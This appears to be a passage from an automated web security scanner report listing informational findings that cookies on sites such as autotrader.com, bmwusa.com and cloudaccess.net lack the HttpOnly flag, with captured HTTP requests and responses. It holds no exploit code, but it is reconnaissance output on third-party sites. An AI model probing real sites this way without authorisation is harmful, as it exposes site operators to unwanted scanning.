14.665. http://www.autotrader.com/research/new-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/new-cars/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=4113720842.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/new-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:55:49 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=4113720842.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.666. http://www.autotrader.com/research/new-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/new-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=FD01CADD9CE8D858; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885067871732; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
BIGipServerwww=2525552650.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/new-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.667. http://www.autotrader.com/research/used-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/used-cars/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=2033346058.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/used-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:55:11 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=2033346058.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.668. http://www.autotrader.com/research/used-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/used-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=F1B5B0190A0903E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885064281746; path=/; expires=Sat, 03-Jan-15 16:04:24 GMT; domain=.autotrader.com
BIGipServerwww=1871241226.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/used-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.669. http://www.autotrader.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww=1787355146.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 16:04:23 GMT
Server: Apache
Location: http://www.autotrader.com/x22/
Vary: Accept-Encoding
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww=1787355146.61475.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.autotrader.c
...[SNIP]...

14.670. http://www.autotrader.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=707945994.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 23:54:50 GMT
Server: Apache
Location: http://www.autotrader.com/x22/
Vary: Accept-Encoding
Content-Length: 238
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=707945994.61475.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.autotrader.c
...[SNIP]...

14.671. http://www.autotrader.com/x22/x3e/x3cli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/x22/x3e/x3cli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=44290BD80D43DD62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885061096866; path=/; expires=Sat, 03-Jan-15 16:04:21 GMT; domain=.autotrader.com
BIGipServerwww=1351147530.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.672. http://www.autotrader.com/x22/x3e/x3cli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/x22/x3e/x3cli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=875718154.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:54:34 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=875718154.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.673. http://www.autotraderclassics.com/find/index.xhtml/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/find/index.xhtml/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
BIGipServerwww.autotraderclassics.com=3985170442.14360.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.674. http://www.autotraderclassics.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotraderclassics.com
Path:	/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
BIGipServerwww.autotraderclassics.com=4203274250.14360.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.675. http://www.barcelonaworldrace.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SERVERID=iom-web11; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Tue, 25 Jan 2011 14:24:31 GMT
Server: Apache
Location: http://www.barcelonaworldrace.org/en/index.php
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=iom-web11; path=/

14.676. http://www.barcelonaworldrace.org/en/actualite/breves previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SERVERID=iom-web10; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/actualite/breves HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 25 Jan 2011 14:24:24 GMT
Server: Apache
Location: http://www.barcelonaworldrace.org/en/actualite/breves/
Content-Length: 262
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: SERVERID=iom-web10; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.barcelonawor
...[SNIP]...

14.677. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barcelonaworldrace.org
Path:	/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SERVERID=iom-web11; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 HTTP/1.1
Host: www.barcelonaworldrace.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.678. http://www.blip.tv/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/about/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tab_state=about; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:12:59 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.679. http://www.blip.tv/blogs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/blogs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.680. http://www.blip.tv/prefs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/prefs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:19 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /prefs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.681. http://www.bmwusa.com/Standard/Content/Vehicles/2011/M/MExplore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/Standard/Content/Vehicles/2011/M/MExplore.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CHECK=XP9y6GTRm#@U; expires=Tue, 25-Jan-2011 13:13:55 GMT; path=/
NSC_CNX_21529_64.29.204.16=4f52b4193660;expires=Tue, 25-Jan-11 13:32:55 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Standard/Content/Vehicles/2011/M/MExplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /Error_Cookieless.aspx?DesiredUrl=/Standard/Content/Vehicles/2011/M/MExplore.aspx&Scheme=http
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 232
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 13:12:55 GMT
Connection: close
Set-Cookie: CHECK=XP9y6GTRm#@U; expires=Tue, 25-Jan-2011 13:13:55 GMT; path=/
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193660;expires=Tue, 25-Jan-11 13:32:55 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fError_Cookieless.aspx%3fDesiredUrl%3d%2fStandard%2fContent%2fVehicles%2f2011%2fM%2fMExplore.aspx%26Scheme%3dhttp">
...[SNIP]...

14.682. https://www.bmwusa.com/ScriptResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.683. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.684. https://www.bmwusa.com/Secured/FrameCheck.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/FrameCheck.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:32:50 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.685. https://www.bmwusa.com/Secured/NaN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/NaN

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; path=/
NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:14 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.686. https://www.bmwusa.com/WebResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.687. https://www.bmwusa.com/jsenvconst.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.688. http://www.boattrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boattrader.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:45:55 GMT
TSef43b4=2ffdd2520e75126ede44933ba8ef34039e5be810eff911074d3e1425759e864aee104e3b; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.689. http://www.care2.com/news/news_post.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.care2.com
Path:	/news/news_post.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

c2_user_state=38cf88fe52bbea1af5f9ce118bb02342%3A0; path=/; domain=.care2.com
c2_user_state=e009b77c4218ecc15ebbe840c71236b3%3A0; path=/; domain=.care2.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/news_post.html?url={u}&title={t} HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.690. http://www.cars.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cars.com
Path:	/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cars_persist=3863024812.20480.0000; expires=Mon, 24-Jan-2011 16:34:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: IBM_HTTP_Server
Location: http://www.cars.com/?aff=x22
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3863024812.20480.0000; expires=Mon, 24-Jan-2011 16:34:34 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.cars.com/?af
...[SNIP]...

14.691. http://www.cloudaccess.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; expires=Sat, 05-Mar-2011 13:52:03 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:03 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; expires=Sat, 05-Mar-2011 13:52:03 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Sun, 24-Jan-2010 13:52:02 GMT; path=/
Last-Modified: Fri, 30 Jul 2010 00:37:43 GMT
Expires: Mon, 24 Jan 2011 14:07:03 GMT
X-Content-Encoded-By: Joomla! 1.5
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.692. http://www.cloudaccess.net/about-us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/about-us.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:53 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about-us.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:53 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
